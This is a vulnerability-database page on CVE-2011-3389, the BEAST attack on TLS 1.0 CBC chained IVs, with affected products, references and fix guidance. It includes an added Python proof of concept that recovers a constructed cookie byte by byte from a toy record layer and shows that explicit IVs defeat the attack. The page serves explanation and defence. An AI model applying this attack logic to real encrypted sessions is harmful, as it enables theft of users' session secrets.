CVE-2011-3389
CVE-2011-3389, known as the "BEAST" attack, is a vulnerability for which this page shows no published severity rating. SSL/TLS CBC cipher suites, as used in certain configurations of Microsoft Windows and Internet Explorer, Mozilla Firefox, Google Chrome, Opera and other products, chain initialization vectors across records; a man-in-the-middle who can also inject chosen plaintext into the HTTPS session (via JavaScript using the HTML5 WebSocket API, the Java URLConnection API or the Silverlight WebClient API) can recover plaintext HTTP headers block by block. EPSS estimates a 73.33% chance of exploitation in the next 30 days.
Description
The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack.
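The mechanism in that description, as an added example that is not code from NVD or from any of the vendors named above: a toy TLS 1.0-style CBC record layer whose IV for the next record is the last ciphertext block it sent, a hypothetical `Victim` whose every request starts with attacker-chosen bytes followed by a secret cookie, and `beast_recover`, which carries out the blockwise chosen-boundary attack. The block cipher is a stand-in Feistel construction over HMAC-SHA256 so the script runs on the standard library alone; `SECRET`, `Victim`, `CbcRecordLayer` and the cookie value are constructed for the example. Passing `explicit_iv=True` switches the record layer to the TLS 1.1 behaviour (a fresh random IV per record, sent on the wire), under which the same attack finds no matching block.

```python
"""Added example: the chained-IV weakness behind BEAST (CVE-2011-3389),
demonstrated against a toy TLS 1.0-style CBC record layer. Not project code."""
import hashlib
import hmac
import os

BLOCK = 16


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in 16-byte keyed permutation (4-round Feistel, HMAC-SHA256 rounds).
    BEAST exploits only CBC's chaining, so the block cipher's identity is
    irrelevant; this avoids a dependency on an AES library."""
    l, r = block[:8], block[8:]
    for i in range(4):
        f = hmac.new(key, bytes([i]) + r, hashlib.sha256).digest()[:8]
        l, r = r, bytes(a ^ b for a, b in zip(l, f))
    return l + r


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class CbcRecordLayer:
    """TLS 1.0 style: the IV for record n+1 is the last ciphertext block of
    record n. With explicit_iv=True it behaves like TLS 1.1+: a fresh random
    IV per record, transmitted in front of the ciphertext."""

    def __init__(self, key: bytes, iv: bytes, explicit_iv: bool = False):
        self.key, self.chain, self.explicit_iv = key, iv, explicit_iv

    def send(self, plaintext: bytes) -> bytes:
        plaintext += b"\x00" * (-len(plaintext) % BLOCK)  # simplified padding
        out = []
        if self.explicit_iv:
            self.chain = os.urandom(BLOCK)
            out.append(self.chain)
        for i in range(0, len(plaintext), BLOCK):
            self.chain = block_encrypt(self.key, xor(plaintext[i:i + BLOCK], self.chain))
            out.append(self.chain)
        return b"".join(out)


class Victim:
    """Hypothetical browser-side app (constructed): each request starts with
    bytes the attacker's script controls, followed by a secret it cannot read."""

    def __init__(self, record_layer: CbcRecordLayer, secret: bytes):
        self.rl, self.secret = record_layer, secret

    def request(self, attacker_prefix: bytes) -> bytes:
        return self.rl.send(attacker_prefix + self.secret)  # ciphertext seen by the MITM


def beast_recover(victim: Victim, secret_len: int):
    """Blockwise chosen-boundary attack: recover the secret one byte at a time.
    Returns the secret, or None if no guess ever matches (IV not predictable)."""
    known = b""
    wire_last = victim.request(b"")[-BLOCK:]  # any observed record fixes the chain
    for k in range(secret_len):
        # Choose the prefix length so secret[k] is the LAST byte of block j and
        # the other 15 bytes of that block are already known to the attacker.
        j, prefix = k // BLOCK, b"A" * (BLOCK - 1 - k % BLOCK)
        ct = victim.request(prefix)
        blocks = [wire_last] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
        c_prev, c_target = blocks[j], blocks[j + 1]
        wire_last = ct[-BLOCK:]
        known15 = (prefix + known)[BLOCK * j:BLOCK * j + BLOCK - 1]
        for g in range(256):
            guess = known15 + bytes([g])
            # The next record's first block is XORed with wire_last, which the
            # attacker already saw. Cancel it so the cipher input is exactly
            # c_prev ^ guess: the target block had the same input iff guess
            # equals plaintext block j.
            ct2 = victim.request(xor(xor(wire_last, c_prev), guess))
            wire_last = ct2[-BLOCK:]
            if ct2[:BLOCK] == c_target:
                known += bytes([g])
                break
        else:
            return None
    return known


SECRET = b"Cookie: session=7f3a9c2b1e"  # constructed sample, not a real cookie


def demo(explicit_iv: bool = False):
    key, iv = os.urandom(16), os.urandom(16)  # the attack never needs the key
    victim = Victim(CbcRecordLayer(key, iv, explicit_iv), SECRET)
    return beast_recover(victim, len(SECRET))


if __name__ == "__main__":
    print("TLS 1.0-style chained IV :", demo())
    print("TLS 1.1-style explicit IV:", demo(explicit_iv=True))
```

Run it directly to see the cookie recovered under chained IVs and `None` under explicit IVs. The attack needs at most 256 requests per secret byte and never touches the key; its precondition is being able to choose the first block of a record after observing the previous one, which is what the WebSocket, Java URLConnection and Silverlight WebClient paths gave attacker-controlled page script. The client-side mitigation in the Chrome, Microsoft and Opera references (1/n-1 record splitting) removes that precondition in the browser; TLS 1.1's explicit per-record IV removes it from the protocol.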
Metrics
Weakness Enumeration
Affected Software
| Vendor | Product | Versions |
|---|---|---|
| Google | Chrome | All versions |
| Microsoft | Internet Explorer | All versions |
| Mozilla | Firefox | All versions |
| Opera | Opera Browser | All versions |
| Microsoft | Windows | All versions |
| Siemens | Simatic Rf68xr Firmware | < 3.2.1 |
| Siemens | Simatic Rf615r Firmware | < 3.2.1 |
| Haxx | Curl | >= 7.10.6, <= 7.23.1 |
| Redhat | Enterprise Linux Desktop | 5.0 |
| Redhat | Enterprise Linux Desktop | 6.0 |
| Redhat | Enterprise Linux Eus | 6.2 |
| Redhat | Enterprise Linux Server | 5.0 |
| Redhat | Enterprise Linux Server | 6.0 |
| Redhat | Enterprise Linux Server Aus | 6.2 |
| Redhat | Enterprise Linux Workstation | 5.0 |
| Redhat | Enterprise Linux Workstation | 6.0 |
| Debian | Debian Linux | 5.0 |
| Debian | Debian Linux | 6.0 |
| Canonical | Ubuntu Linux | 10.04 |
| Canonical | Ubuntu Linux | 10.10 |
| Canonical | Ubuntu Linux | 11.04 |
| Canonical | Ubuntu Linux | 11.10 |
References
- http://curl.haxx.se/docs/adv_20120124B.html (Third Party Advisory)
- http://downloads.asterisk.org/pub/security/AST-2016-001.html (Third Party Advisory)
- http://ekoparty.org/2011/juliano-rizzo.php (Broken Link)
- http://eprint.iacr.org/2004/111 (Third Party Advisory)
- http://eprint.iacr.org/2006/136 (Third Party Advisory)
- http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.html (Not Applicable, Vendor Advisory)
- http://isc.sans.edu/diary/SSL+TLS+part+3+/11635 (Third Party Advisory)
- http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.html (Broken Link, Mailing List)
- http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html (Broken Link, Mailing List)
- http://lists.apple.com/archives/security-announce/2012/May/msg00001.html (Broken Link, Mailing List)
- http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html (Broken Link, Mailing List)
- http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html (Broken Link, Mailing List)
- http://marc.info/?l=bugtraq&m=132750579901589&w=2 (Issue Tracking, Mailing List, Third Party Advisory)
- http://marc.info/?l=bugtraq&m=132872385320240&w=2 (Issue Tracking, Mailing List, Third Party Advisory)
- http://marc.info/?l=bugtraq&m=133365109612558&w=2 (Issue Tracking, Mailing List, Third Party Advisory)
- http://marc.info/?l=bugtraq&m=133728004526190&w=2 (Issue Tracking, Mailing List, Third Party Advisory)
- http://marc.info/?l=bugtraq&m=134254866602253&w=2 (Issue Tracking, Mailing List, Third Party Advisory)
- http://marc.info/?l=bugtraq&m=134254957702612&w=2 (Issue Tracking, Mailing List, Third Party Advisory)
- http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue (Third Party Advisory)
- http://osvdb.org/74829 (Broken Link)
- http://rhn.redhat.com/errata/RHSA-2012-0508.html (Third Party Advisory)
- http://secunia.com/advisories/45791 (Not Applicable)
- http://secunia.com/advisories/47998 (Not Applicable)
- http://secunia.com/advisories/48256 (Not Applicable)
- http://secunia.com/advisories/48692 (Not Applicable)
- http://secunia.com/advisories/48915 (Not Applicable)
- http://secunia.com/advisories/48948 (Not Applicable)
- http://secunia.com/advisories/49198 (Not Applicable)
- http://secunia.com/advisories/55322 (Not Applicable)
- http://secunia.com/advisories/55350 (Not Applicable)
- http://secunia.com/advisories/55351 (Not Applicable)
- http://security.gentoo.org/glsa/glsa-201203-02.xml (Third Party Advisory)
- http://security.gentoo.org/glsa/glsa-201406-32.xml (Third Party Advisory)
- http://support.apple.com/kb/HT4999 (Third Party Advisory)
- http://support.apple.com/kb/HT5001 (Third Party Advisory)
- http://support.apple.com/kb/HT5130 (Third Party Advisory)
- http://support.apple.com/kb/HT5281 (Broken Link)
- http://support.apple.com/kb/HT5501 (Third Party Advisory)
- http://support.apple.com/kb/HT6150 (Third Party Advisory)
- http://technet.microsoft.com/security/advisory/2588513 (Patch, Vendor Advisory)
- http://vnhacker.blogspot.com/2011/09/beast.html (Third Party Advisory)
- http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf (Third Party Advisory)
- http://www.debian.org/security/2012/dsa-2398 (Third Party Advisory)
- http://www.ibm.com/developerworks/java/jdk/alerts/ (Third Party Advisory)
- http://www.imperialviolet.org/2011/09/23/chromeandbeast.html (Third Party Advisory)
- http://www.insecure.cl/Beast-SSL.rar (Broken Link, Patch)
- http://www.kb.cert.org/vuls/id/864643 (Third Party Advisory, US Government Resource)
- http://www.opera.com/docs/changelogs/mac/1151/ (Third Party Advisory)
- http://www.opera.com/docs/changelogs/mac/1160/ (Third Party Advisory)
- http://www.opera.com/docs/changelogs/unix/1151/ (Third Party Advisory)
- http://www.opera.com/docs/changelogs/unix/1160/ (Third Party Advisory)
- http://www.opera.com/docs/changelogs/windows/1151/ (Third Party Advisory)
- http://www.opera.com/docs/changelogs/windows/1160/ (Third Party Advisory)
- http://www.opera.com/support/kb/view/1004/ (Third Party Advisory, Vendor Advisory)
- http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html (Third Party Advisory)
- http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html (Third Party Advisory)
- http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html (Third Party Advisory)
- http://www.redhat.com/support/errata/RHSA-2011-1384.html (Third Party Advisory, Vendor Advisory)
- http://www.redhat.com/support/errata/RHSA-2012-0006.html (Third Party Advisory)
- http://www.securityfocus.com/bid/49388 (Third Party Advisory, VDB Entry)
- http://www.securityfocus.com/bid/49778 (Third Party Advisory, VDB Entry)
- http://www.securitytracker.com/id/1029190 (Broken Link, Third Party Advisory, VDB Entry)
- http://www.securitytracker.com/id?1025997 (Broken Link, Third Party Advisory, VDB Entry)
- http://www.securitytracker.com/id?1026103 (Broken Link, Third Party Advisory, VDB Entry)
- http://www.securitytracker.com/id?1026704 (Broken Link, Third Party Advisory, VDB Entry)
- http://www.ubuntu.com/usn/USN-1263-1 (Third Party Advisory)
- http://www.us-cert.gov/cas/techalerts/TA12-010A.html (Third Party Advisory, US Government Resource)
- https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail (Third Party Advisory)
- https://bugzilla.novell.com/show_bug.cgi?id=719047 (Issue Tracking, Third Party Advisory)
- https://bugzilla.redhat.com/show_bug.cgi?id=737506 (Issue Tracking, Third Party Advisory)
- https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf (Third Party Advisory)
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006 (Patch, Vendor Advisory)
- https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02 (Third Party Advisory, US Government Resource)
Timeline
- Published
- Last Modified
- Status
- Modified
Frequently Asked Questions
What is CVE-2011-3389?
It is the "BEAST" weakness in SSL 3.0 / TLS 1.0 CBC cipher suites: the IV for each record is the last ciphertext block of the previous record, so a man-in-the-middle who can also inject chosen plaintext into the session (through WebSocket, Java URLConnection or Silverlight WebClient code running in the victim's browser) can recover secrets such as HTTP cookie headers one byte at a time.
How severe is CVE-2011-3389?
This page lists no CVSS score for it. EPSS estimates a 73.33% chance of exploitation in the next 30 days. The impact is confidentiality (plaintext disclosure); exploitation requires both an active network position and the ability to run script in the victim's browser.
How do I fix CVE-2011-3389?
Apply the vendor updates listed under References: Microsoft advisory 2588513 / MS12-006 for Windows, the October 2011 Chrome stable release, Opera 11.51 or 11.60, a curl release newer than 7.23.1, and the Red Hat, Debian, Ubuntu and Gentoo errata for the affected distributions. The browser and Windows fixes split each CBC record (1/n-1 record splitting) so an attacker can no longer place a whole chosen block behind a predictable IV. On the server side, prefer TLS 1.1 or later, which uses an explicit per-record IV, and disable TLS 1.0 where your clients allow it.
Source: NVD / NIST
